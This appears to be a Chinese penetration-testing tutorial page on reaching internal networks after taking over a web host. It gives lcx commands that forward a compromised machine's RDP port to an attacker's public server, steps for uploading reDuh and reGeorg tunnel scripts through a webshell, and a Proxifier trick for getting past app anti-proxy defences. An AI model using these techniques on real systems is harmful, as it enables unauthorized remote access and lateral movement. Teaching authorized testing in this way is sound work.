# 内网穿透方式
渗透测试过程中,经常会遇到以下场景:通过web脚本漏洞获得了某web主机的system权限,甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透。
## 零、NAT网络地址转换?
网络地址转换(Network Address Translation,NAT)机制的问题在于,NAT设备自动屏蔽了非内网主机主动发起的连接,也就是说,从外网发往内网的数据包将被NAT设备丢弃,这使得位于不同NAT设备之后的主机之间无法直接交换信息。
一方面保护了内网主机免于来自外部网络的攻击,另一方面也为P2P通信带来了一定困难。
外部主机要与内网主机相互通信,必须由内网主机主动发起连接,使 NAT设备产生一个映射条目,这就有必要研究一下内网穿透技术。
## 1️⃣在同一局域网下的远程控制
***
如果开启了3389远程登陆,那么直接远程就好了
①右击我的电脑,选择属性后点击远程控制,点击允许远程控制此计算机,按win+R,输入cmd进入dos,输入ipconfig查看本机IP,由于远程控制要求被控制电脑的账户有密码,所以如果没有设置账户密码的话还要再dos下输入net user Administrator XXX,XXX是你的密码
>②在另一台电脑上按win+R,输入mstsc,再在弹出的页面输入被控制电脑的ip,然后再输入用户名Administrator和你刚才设置的密码。
![](https://upload-images.jianshu.io/upload_images/24055255-140cbdad1354b8dd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
**💦连接成功,测试一下发现几乎没有延迟,仿佛用的就是被控制的电脑,希望外网控制时也能这样快。**
## 2️⃣通信双方一台位于NAT 之后
攻击者这边,要有一个有 公网IP的服务器,以便接收反向连接
### 第一:Webshell如何开启3389服务
**①、通过修改注册表开启远程终端**
**详情参考:** 🤖开启3389常用终端命令篇章
**②、通过webshell上传3389工具开启远程终端**
### 第二:如果服务器端口被修改如何查找?
目前主要通过注册表读取、端口扫描、命令探针等三种方法查找修改后的端口。
### 第三:如何远程连接内网电脑?
#### 1、通过lcx端口转发
**概念:**
1. 首先内网中的主机一般都是使用的私有ip,在网络出口处经过NAT转换为公网ip后,才能访问internet。
2. 所以,有时当我们进入网站后台cmd,或者捕获了一台内网中的肉鸡,是无法主动去链接这台肉鸡的,也不好在别人的路由器上做端口映射,这就体现lcx的作用了。
3. lcx实现端口转发,将肉鸡A上的某个端口(常用的3389),转发到具有公网地址的主机B上,这样我们只需要连接主机B的3389端口就相当于连接到了肉鸡A上,从而突破了内网私有ip的限制。
**步骤:**
1. 获取webshell后:
上传一个cmd.exe文件和lck.exe,然后setp cmd.exe设置终端路径解决运行权限问题。
2. Webshell上执行:
```cmd
#将本机(肉鸡)3389端口流量转发到公网ip的2222端口上去
lcx.exe -slave 自己的公网ip 2222 127.0.0.1 3389
```
3. 自己的服务器里面执行:
```cmd
# 监听本地的2222端口将流量转发到4444
lcx.exe -listen 2222 4444
```
4. 最后通过3389连接172.0.0.1:4444即可
#### 2、通过reDuh端口转发脚本
**概念**
ReDuh 是一个通过 HTTP 协议建立隧道传输各种其他数据的工具。其可以把内网服务器的端口通过 http/https 隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。
**步骤:**
1. 将reDuh.php上传到目标服务器
2. 在物理机成功访问reDuh.php
xxxx.com/reDuh.php
3. 打开客户端reDuhGUI.exe,进行连接,然后就可以用3389进行连接了
## 3️⃣通信双方均位于NAT设备之后
使用reGeorg+Proxifier
***
**概念**
有时候你路由器的ip并不是公网ip,也就是说你的路由器也是另一层局域网下的设备,这种情况下只对你的路由器进行端口映射然并卵,因为你始终拿不到最顶层路由ip。
**步骤:**
1. 将tunnel.nosocket.php上传至目标主机
2. 通过网页能正常访问tunnel.nosocket.php后
再打开reGeorgSocksProxy.py脚本文件进行配置
```python
\reGeorgSocksProxy.py -p 9999 -u http://192.168.0.102:8080/tunnel.nosocket.php
```
3. 安装Proxifier,并设置代理规则。除reGeorgSocksProxy.py外,其余都设置为通过代理
![mark](http://noah-pic.oss-cn-chengdu.aliyuncs.com/pic/20210806/181238778.png)
4. 完成上述步骤后,即可访问目标的内部网络
![](https://upload-images.jianshu.io/upload_images/21549033-712a5b3dce41d939.png?imageMogr2/auto-orient/strip|imageView2/2/w/1200)
## 补充:关于burp+Proxifier结合抓包
如微信等有很多APP现在是防代理的或者黑名单防御,但是抓包中间加一个环节使用这个Proxifier软件作为中间代理,就可以应对了,因为socks是很正规的
**方法**
1. 在电脑上装模拟器
2. 把burp ca证书丢在模拟器里加载
3. 设置规则 新建规则
让模拟器这个进程所有数据包走socks就可以了
注意:结合使用的工具不要进行拦截,要选择direct模式
4. 访问验证
- src导航站
- kali和msf
- 信息收集
- 收集域名信息
- Whois 查询
- 备案信息查询
- 信用信息查询
- IP反查站点的站
- 浏览器插件
- 收集子域名信息
- 在线平台
- 工具枚举
- ssl与证书透明度
- DNS历史解析
- DNS域传送漏洞
- C段探测
- JS文件域名&ip探测
- 搜索引擎&情报社区
- google黑客
- 威胁情报
- 钟馗之眼
- 收集相关应用信息
- 微信公众号&微博
- APP收集&反编译
- 收集常用端口信息
- 常见端口&解析&总结
- 扫描工具
- 网络空间引擎搜索
- 浏览器插件
- nmap扫描
- 收集敏感信息
- 源码泄露
- 邮箱信息收集
- 备份文件泄露
- 目录&后台扫描
- 公网网盘
- 历史资产
- 指纹&WAF&CDN识别
- 指纹识别
- CDN识别
- 绕过CDN查找真实IP
- WAF识别
- 漏洞资源和社工
- 漏洞公共资源库
- 社会工程
- 资产梳理
- 各种对渗透有帮助的平台
- 扫描器
- 扫描器对比
- AppScan(IBM)_web和系统
- AWVS_web扫描
- X-Scan_系统扫描
- WebInspect_HP_WEB
- Netsparker_web
- WVSS_绿盟_web
- 安恒明鉴
- Nessus_系统
- nexpose_系统
- 启明天镜_web_系统
- SQL注入
- 常用函数
- sql注入步骤
- union注入和information_schema库
- 函数和报错注入
- SQL盲注
- 其他注入方式
- 防止SQL注入解决方案
- Access数据库注入
- MSSQL数据库注入
- MYSQL数据库注入
- 神器SQLmap
- xss跨站脚本攻击
- xss原理和分类
- xss案例和修复
- xss绕过技巧
- xss案例
- 文件上传下载包含
- 常有用文件路径
- 文件上传漏洞
- 文件下载漏洞
- 文件包含漏洞
- upload-labs上传漏洞练习
- XXE、SSRF、CSRF
- SSRF原理基础
- SSRF案例实战
- CSRF原理基础
- CSRF案例及防范
- XXE之XML_DTD基础
- XXE之payload与修复
- XXE结合SSRF
- 远程命令执行与反序列化
- 远程命令和代码执行漏洞
- 反序列化漏洞
- 验证码与暴力破解
- 爆破与验证码原理
- CS架构暴力破解
- BS架构暴力破解
- WEB编辑器漏洞
- 编辑器漏洞基础
- Ewebeditor编辑器
- FCKeditor编辑器
- 其他编辑器
- web中间件漏洞
- 中间件解析漏洞
- Tomcat常见的漏洞总结
- Jboss漏洞利用总结
- Weblogic漏洞利用总结
- WEB具体步骤
- 旁注和越权
- CDN绕过
- 越权与逻辑漏洞
- WEB应用常见其他漏洞
- WEB登陆页面渗透思路
- 获取WEBshell思路
- 社工、钓鱼、apt
- 社工和信息收集
- 域名欺骗
- 钓鱼邮件
- 一些钓鱼用的挂马工具
- 代码审计
- 代码审计工具
- WAF绕过
- WAF基础及云WAF
- 各种WAF绕过方法
- 绕过WAF上传文件
- 系统提权
- windows系统提权
- linux系统提权
- 数据库提权操作系统
- 内网横向渗透
- 内网穿透方式
- 一些内网第三方应用提权
- ARP与DOS
- ARP欺骗
- DOS与DDOS
- 一些DOS工具